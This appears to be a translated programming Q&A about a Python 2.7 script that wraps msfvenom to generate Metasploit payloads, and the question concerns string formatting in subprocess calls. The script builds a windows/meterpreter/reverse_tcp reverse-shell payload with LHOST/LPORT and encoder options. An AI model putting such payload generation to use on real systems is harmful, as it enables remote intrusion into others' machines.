我試圖用Python 2.7.12創建一個Metasploit負載生成器。它使用msfvenom
產生許多惡意有效載荷。在Python中傳遞命令行參數時將字符串附加到字符串中2.7.12
首先我使用%s
和%d
格式運算符。
call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s",
"LPORT=%s", "-e %s", "-i %d", "-f %s", "> %s.%s"]) % (str(lhost),
str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop))
此錯誤返回
/usr/bin/msfvenom:168:in `parse_args': invalid argument: -i %d
(OptionParser::InvalidArgument)
from /usr/bin/msfvenom:283:in `<main>'
Traceback (most recent call last):
File "menu.py", line 74, in <module>
call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s",
"LPORT=%s", "-e %s", "-i %d", "-f %s", "> %s.%s"]) % (str(lhost),
str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop))
TypeError: unsupported operand type(s) for %: 'int' and 'str'
我能夠理解msfvenom無法解析我傳遞參數,這是迭代標誌,-i
。之後,我看到Python的一個錯誤,TypeError
。
進行一番研究,我決定使用.format()
,因爲
call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={0}",
"LPORT={1}", "-e {2}", "-i {3}", "-f {4}", "> {5}.{6}"]).format(lhost,
lport, encode, iteration, formatop, payname, formatop)
返回
AttributeError: 'int' object has no attribute 'format'
我應該怎麼辦?也有反正我可以優化我的程序,而不是複製和粘貼同一行,並更改15個選項的有效載荷類型?
您需要在字符串上調用'format',即''值爲:{}「。format(1)' – maxymoo